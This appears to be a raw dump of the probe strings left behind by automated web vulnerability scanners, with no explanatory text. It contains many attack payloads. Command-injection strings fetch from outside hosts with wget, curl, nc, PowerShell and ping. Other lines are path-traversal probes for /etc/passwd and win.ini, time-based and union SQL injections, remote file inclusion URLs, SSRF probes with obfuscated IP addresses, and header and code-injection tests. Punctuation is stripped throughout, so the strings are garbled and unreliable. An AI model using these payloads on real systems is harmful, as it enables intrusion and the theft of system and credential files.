........................binid|
|
........................usrbinid|
|
1234|wget http10.40.68.8116425AppScanMsg.htmlvarId=56|echo
|
1234|wget http10.40.68.8116425AppScanMsg.htmlvarId=58|echo
|
1234|wget http10.40.68.8116425AppScanMsg.htmlvarId=59|echo
|
1234|echo -e GET AppScanMsg.htmlvarId=60 HTTP1.0\r\n\r\n | nc 10.40.68.81 16425|echo
|
1234|echo -e GET AppScanMsg.htmlvarId=62 HTTP1.0\r\n\r\n | nc 10.40.68.81 16425|echo
|
1234|echo -e GET AppScanMsg.htmlvarId=64 HTTP1.0\r\n\r\n | nc 10.40.68.81 16425|echo
|
1234curl http10.40.68.8116425AppScanMsg.htmlvarId=65
|
res.endrequirefs.readdirSync..toString
|
1234
AppScanHeader AppScanValue1.2-97
SecondAppScanHeader whatever
|
1234 AppScanHeader AppScanValue1.2-106 SecondAppScanHeader whatever
|
res.endrequirefs.readdirSync..toString
|
res.endrequirefs.readdirSync...toString
|
res.endrequirefs.readdirSync...toString
|
1multioussecanonymAppendName3
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
httpwww.site120.cnwebscantest_alert.html
|
..............windowswin.ini
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
..............windowswin.ini.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
Response.Write8-9999108099999
|
Response.Write8-9999108099999
|
1multioussecanonymAppendName3
|
..............windowswin.ini
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
..............windowswin.ini.htm
|
httpwww.site120.cnwebscantest_alert.html
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
................................................etc.anonymousec
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
................................................etc.anonymousec.htm
|
www.site120.cn2012_rFi_0702.txt
|
..............etc.passwd.htm
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
................................................etc.anonymousec
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
................................................etc.anonymousec.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
Response.Write8-9999108099999
|
Response.Write8-9999108099999
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
httphit39650539a2.bxss.me
|
1multioussecanonymAppendName3
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
1multioussecanonymAppendName3
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
httphit5264a87160.bxss.me
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
..............windowswin.ini.htm
|
httpwww.site120.cnwebscantest_alert.html
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
................................................etc.anonymousec
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
................................................etc.anonymousec.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
................................................etc.anonymousec.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
............WEB-INFweb.xml
|
............WEB-INFweb.xml
|
............WEB-INFweb.xml
|
Response.Write8-9999108099999
|
response.write9593912*9762915
|
response.write9593912*9762915
|
response.write9593912*9762915
|
nslookup uXoyGmth\`0nslookup uXoyGmth`
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
Httptestasp.vulnweb.comtfit.txt
|
httphitZ55hhV8fsz.bxss.me
|
httptestasp.vulnweb.comtfit.txt.jpg
|
HttPtestasp.vulnweb.comtxss.html00
|
testasp.vulnweb.comtxss.html00
|
....................windowswin.ini
|
printmd5acunetix_wvs_security_test
|
C\WINDOWS\system32\drivers\etc\hosts
|
printmd5acunetix_wvs_security_test$a=
|
printmd5acunetix_wvs_security_test$a=
|
$@printmd5acunetix_wvs_security_test
|
....................windowswin.ini.jpg
|
????????????????????????????????????????????????windows??win.ini
|
$@printmd5acunetix_wvs_security_test\
|
................windowswin.ini
|
..\..\..\..\..\..\..\..\windows\win.ini
|
.\\..\\..\\..\\..\\..\\.windowswin.ini
|
................................windowswin.ini
|
................................................windowswin.ini
|
-1 OR 267-67-1=0001 or RVKWkguj=
|
0XORifnow=sysdate,sleep16,0XORZ
|
0XORifnow=sysdate,sleep16,0XORZ
|
select0fromselectsleep16v*select0fromselectsleep16vselect0fromselectsleep16v*
|
D9mz8NTR waitfor delay 008
|
AFscgarQ waitfor delay 008
|
3zXC0K6O waitfor delay 0016
|
BTerNJOiselect pg_sleep24
|
goV5URmyselect pg_sleep24
|
SSDrmluKselect pg_sleep24
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
httphit025ba45a15.bxss.me
|
1multioussecanonymAppendName3
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
..............etc.passwd.htm
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
httpwww.site120.cnwebscantest_alert.html
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
Response.Write8-9999108099999
|
Response.Write8-9999108099999
|
httphit00ab22501b.bxss.me
|
1multioussecanonymAppendName3
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
httpwww.site120.cnwebscantest_alert.html
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
www.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
................................................etc.anonymousec
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
............WEB-INFweb.xml
|
................................................etc.anonymousec.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..............etc.passwd.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..............etc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
Response.Write8-9999108099999
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
1multioussecanonymAppendName3
|
httphit1347279374.bxss.me
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
httpwww.site120.cnwebscantest_alert.html
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
..............etc.passwd.htm
|
............WEB-INFweb.xml
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
................................................etc.anonymousec
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
................................................etc.anonymousec.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
Response.Write8-9999108099999
|
1multioussecanonymAppendName3
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
1 ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
httphit7916677517.bxss.me
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
1 ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
..............windowswin.ini
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
httpwww.site120.cnwebscantest_alert.html
|
..............windowswin.ini.htm
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
www.site120.cn2012_rFi_0702.txt
|
............WEB-INFweb.xml
|
..............etc.passwd.htm
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
1 and ifnow=sysdate,sleep0,0*XORifnow=sysdate,sleep0,0ORXORifnow=sysdate,sleep0,0OR*
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
............WEB-INFweb.xml
|
1 and ifnow=sysdate,sleep6,0*XORifnow=sysdate,sleep6,0ORXORifnow=sysdate,sleep6,0OR*
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
1 and 1 in select BENCHMARK0,MD5CHAR97
|
Response.Write8-9999108099999
|
1 and 1 in select BENCHMARK28000000,MD5CHAR97
|
1 and 1 in select BENCHMARK0,MD5CHAR97
|
1 and 1 in select BENCHMARK28000000,MD5CHAR97
|
1 and 1 in select BENCHMARK0,MD5CHAR97
|
1 and 1 in select BENCHMARK28000000,MD5CHAR97
|
1 and 1 in select BENCHMARK0,MD5CHAR97
|
1 and 1 in select BENCHMARK28000000,MD5CHAR97
|
1 and 1 in select BENCHMARK0,MD5CHAR97
|
1 and 1 in select BENCHMARK28000000,MD5CHAR97
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
aa WebScanCustomInjectedHeader Injected_by_anonymous
|
..............windowswin.ini
|
WebScanCustomInjectedHeader Injected_by_anonymous
|
..............windowswin.ini.htm
|
aa WebScanCustomInjectedHeader Injected_by_anonymous
|
httpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
-1 uNiOn sElEct concatchar97,char107,char100,char100,char108,char98,char98,char103,char101,concatchar97,char107,char100,char100,char108,char98,char98,char103,char101 -
|
-1 uNiOn sElEct concatchar97,char107,char100,char100,char108,char98,char98,char103,char101,concatchar97,char107,char100,char100,char108,char98,char98,char103,char101 -
|
................WEB-INFweb.xml
|
1**anD**2239=2239**anD**1=1
|
1**anD**9049=1990**anD**1=1
|
1**anD**7599=9377**anD**1=1
|
1**anD**9733=9733**anD**1=1
|
1**anD**9616=9616**anD**1=1
|
1**anD**0710=8527**anD**1=1
|
1**anD**2891=7505**anD**=
|
1**anD**2294=2294**anD**=
|
1**anD**2694=2694**anD**=
|
1**anD**8880=7270**anD**=
|
1**anD**2694=2694**anD**=
|
1**anD**8322=8322**anD**=
|
1**anD**1973=4673**anD**=
|
1**oR**3672=1763**anD**1=1
|
1**oR**6430=6430**anD**1=1
|
1**oR**6655=6655**anD**1=1
|
1**oR**6655=6655**anD**1=1
|
1**oR**2245=0437**anD**1=1
|
1**oR**2245=0437**anD**1=1
|
httpwww.site120.cn2012_rFi_0702.txt
|
............WEB-INFweb.xml
|
............WEB-INFweb.xml
|
wget http10.211.55.358721AppScanMsg.htmlvarId=3179
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3182
|
1234 | wget http10.211.55.358721AppScanMsg.htmlvarId=3184
|
ping -c 1 ping.3192_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 ping -c 1 ping.3194_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3188
|
1234 ping -c 1 ping.3197_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 | ping -c 1 ping.3201_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 `wget http10.211.55.358721AppScanMsg.htmlvarId=3199`
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3203
|
1234|powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3185
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3206
|
1234 || wget http10.211.55.358721AppScanMsg.htmlvarId=3205
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3207
|
1234 $wget http10.211.55.358721AppScanMsg.htmlvarId=3210
|
powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3220
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3225
|
1234||powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3229
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3237#
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3239#
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3240
|
1234 ping -c 1 ping.3202_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 || ping -c 1 ping.3242_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3241
|
1234powershell -command Invoke-WebRequest http10.211.55.358721AppScanMsg.htmlvarId=3244
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3222 #
|
1234 ping -c 1 ping.3243_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com #
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3249 #
|
1234 ping -c 1 ping.3253_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com #
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3257
|
1234 ping -c 1 ping.3261_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 wget http10.211.55.358721AppScanMsg.htmlvarId=3265
|
1234 ping -c 1 ping.3272_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 $ping -c 1 ping.3294_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
1234 `ping -c 1 ping.3295_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com`
|
1234 ping -c 1 ping.3319_059d2384-dbe1-46b9-b9d4-a16c3ddad885.securityip.appsechcl.com
|
http10.211.55.358721AppScanMsg.htmlvarId=3337
|
http18161433958721AppScanMsg.htmlvarId=3351
|
http0x000A.0x0000D3.0x037.0x000000358721AppScanMsg.htmlvarId=3361
|
http00012.000000323.0000067.0000358721AppScanMsg.htmlvarId=3367
|
http00000126463340358721AppScanMsg.htmlvarId=3368
|
http0x0A.211.000000067.0x0000358721AppScanMsg.htmlvarId=3372
|
http447658163558721AppScanMsg.htmlvarId=3375
|
ping.3374_a27565aa-6144-413e-be6b-86bef19bd327.securityip.appsechcl.com
|
httpping.3392_a27565aa-6144-413e-be6b-86bef19bd327.securityip.appsechcl.com
|
http1234@ping.3394_a27565aa-6144-413e-be6b-86bef19bd327.securityip.appsechcl.com
|
1234 AppScanHeader AppScanValue1.2-3421 SecondAppScanHeader whatever
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
WebScanCustomInjectedHeader Injected_by_Anymous
|
httphita33509ab85.bxss.me
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
aa WebScanCustomInjectedHeader Injected_by_Anymous
|
1multioussecanonymAppendName3
|
............WEB-INFweb.xml
|
............WEB-INFweb.xml
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
hTTpwww.site120.cn2012_rFi_0702.txt
|
www.site120.cn2012_rFi_0702.txt
|
httpwww.site120.cnwebscantest_alert.html
|
..............windowswin.ini
|
..............windowswin.ini.htm
|
..............etc.passwd.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
................................................etc.anonymousec
|
................................................etc.anonymousec.htm
|
............WEB-INFweb.xml
|
............WEB-INFweb.xml
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini
|
.2e.2e.2e.2e.2e.2e.2ewindowswin.ini.htm
|
............WEB-INFweb.xml
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd
|
.2e.2e.2e.2e.2e.2e.2eetc.passwd.htm
|
............WEB-INFweb.xml
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd
|
..2F..2F..2F..2F..2F..2F..2Fetc.passwd.htm
|
..2F..2F..2F..2F..2F..2F..2Fwindowswin.ini.htm
|
............WEB-INFweb.xml
|
HCL4ppsc4nbuggyRandomValue
|
wget http169.254.79.7018036AppScanMsg.htmlvarId=5042
|
1234|powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5043
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5044
|
ping -c 1 v3-ping-5045-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5046
|
1234 | wget http169.254.79.7018036AppScanMsg.htmlvarId=5049
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5048
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5050
|
1234 ping -c 1 v3-ping-5051-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234 `wget http169.254.79.7018036AppScanMsg.htmlvarId=5053`
|
1234 ping -c 1 v3-ping-5055-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5056
|
1234 | ping -c 1 v3-ping-5058-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5059
|
1234 ping -c 1 v3-ping-5060-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234||powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5062
|
1234 || ping -c 1 v3-ping-5065-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5066#
|
1234 ping -c 1 v3-ping-5067-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com #
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5063
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5069#
|
1234 ping -c 1 v3-ping-5073-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com #
|
1234 || wget http169.254.79.7018036AppScanMsg.htmlvarId=5071
|
1234 ping -c 1 v3-ping-5075-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5074
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5077
|
1234 ping -c 1 v3-ping-5079-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234 $wget http169.254.79.7018036AppScanMsg.htmlvarId=5078
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5080
|
1234 $ping -c 1 v3-ping-5081-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234 `ping -c 1 v3-ping-5083-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com`
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5082 #
|
http169.254.79.7018036AppScanMsg.htmlvarId=5085
|
1234 ping -c 1 v3-ping-5086-fe784e21-97cc-4171-845f-623b12e652ef.securityip.appsechcl.com
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5087 #
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5088
|
http285201594218036AppScanMsg.htmlvarId=5090
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5089
|
1234Akdieprobehq0001C7kdA
|
1234Akdieprobehq0001C7kdA
|
http0x00A9.0x0000FE.0x04F.0x000004618036AppScanMsg.htmlvarId=5091
|
wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5092
|
http0xA9FE4F4618036AppScanMsg.htmlvarId=5093
|
http000251.000000376.00000117.000010618036AppScanMsg.htmlvarId=5095
|
12343Bwget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5094
|
http000002517744750618036AppScanMsg.htmlvarId=5096
|
ping -c 1 v3-ping-5214-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 ping -c 1 v3-ping-5221-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 ping -c 1 v3-ping-5222-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5220
|
1234 | ping -c 1 v3-ping-5223-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 ping -c 1 v3-ping-5225-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5218
|
powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5227
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5228
|
1234||powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5229
|
1234 `wget http169.254.79.7018036AppScanMsg.htmlvarId=5224`
|
1234 || ping -c 1 v3-ping-5226-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5233#
|
1234 ping -c 1 v3-ping-5235-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com #
|
1234 ping -c 1 v3-ping-5241-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com #
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5231
|
1234 ping -c 1 v3-ping-5242-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 || wget http169.254.79.7018036AppScanMsg.htmlvarId=5243
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5236#
|
1234 ping -c 1 v3-ping-5244-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234 $wget http169.254.79.7018036AppScanMsg.htmlvarId=5246
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5249
|
1234 $ping -c 1 v3-ping-5247-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5251
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5250 #
|
1234powershell -command Invoke-WebRequest http169.254.79.7018036AppScanMsg.htmlvarId=5254
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5257 #
|
1234 `ping -c 1 v3-ping-5253-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com`
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5259
|
http169.254.79.7018036AppScanMsg.htmlvarId=5258
|
1234 ping -c 1 v3-ping-5262-7ae70e77-1efe-459e-8635-12727725987d.securityip.appsechcl.com
|
1234Akdieprobehq0001CCkdA
|
1234 wget http169.254.79.7018036AppScanMsg.htmlvarId=5266
|
wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5271
|
12343Bwget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5272
|
1234Akdieprobehq0001CCkdA
|
http285201594218036AppScanMsg.htmlvarId=5263
|
12347Cwget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5275
|
